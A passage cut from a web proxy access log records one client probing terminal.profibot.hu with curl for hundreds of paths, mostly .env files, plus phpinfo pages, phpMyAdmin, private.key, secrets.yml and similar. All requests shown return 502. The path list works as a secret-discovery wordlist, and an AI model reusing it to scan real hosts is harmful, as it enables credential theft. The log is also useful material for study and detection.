web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/old_site/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/oldsanta/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/opencart/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/ops/vagrant/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/option/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/orientdb-client/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/outputs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/owncloud/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/p.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/packages/styled-ui-docs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/packages/web/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/packed/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/page-editor/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/panel/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/parity/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/Passportjs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/patchwork/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/path/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/pfbe/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/php.ini" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/php.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/php1.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/php52/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/php_info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpcustom_info/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.html" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php4" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php5" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo1.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo2.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo3.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo4.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfodev.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfos.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpMyAdmin/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpmyadmin/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo/phpsysinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phptest.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/phpversion.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/pi.php5" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/pictures/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/platform/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/playground/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/plugin_static/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:29 +0000] - - 502 - GET https terminal.profibot.hu "/plugins/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/post-deployment/.vscode/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/postfixadmin/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/prestashop/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/preview-env/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/preview/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/price_hawk_client/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/prisma/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/private.key" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/processor/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/Procfile" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/prod/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/product/.env.staging" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/projbackend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/project/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/project_root/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/protected/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/psnlink/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/pt2/countries/src/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/pt8/library-backend-gql/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/pub/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/public/system" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/public_html/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/public_root/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/q.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/qq.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/question2/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/qv-frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/rabbitmq-cluster/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/rails-api/react-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/rails/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/rasax/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:30 +0000] - - 502 - GET https terminal.profibot.hu "/react/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/react_todo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/redmine/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/repo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/repos/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/repository/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/resources/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/mysql/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/phpmyadmin/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/rabbitmq/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/rediscommander/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/resourcesync/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/rest.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/rest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/restapi/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/results/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/robots.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/robots/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/rollup.config.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/root/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/rosterBack/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/roundcube/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/roundcubemail/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/routes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/run/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/rust-backend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/rust-backend/dao/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/s-with-me-front/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/s3.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/saas/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/samples/chatroom/chatroom-spa/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:31 +0000] - - 502 - GET https terminal.profibot.hu "/samples/docker/deploymentscripts/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/sapi/debug/default/view" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/script/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/fvt/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/selfish-darling-backend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/serve-browserbench/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/Serve_time_server/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/server-status" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/server.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/server/config/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/server/laravel/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/server/s3.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/server/src/persistence/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/Server_with_db/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/serverless.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/service-worker.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/service/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/adminer/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/deployment-agent/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/documents/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/graylog/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/jaeger/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/minio/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/monitoring/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/portainer/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/redis-commander/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:32 +0000] - - 502 - GET https terminal.profibot.hu "/services/registry/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/services/simcore/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 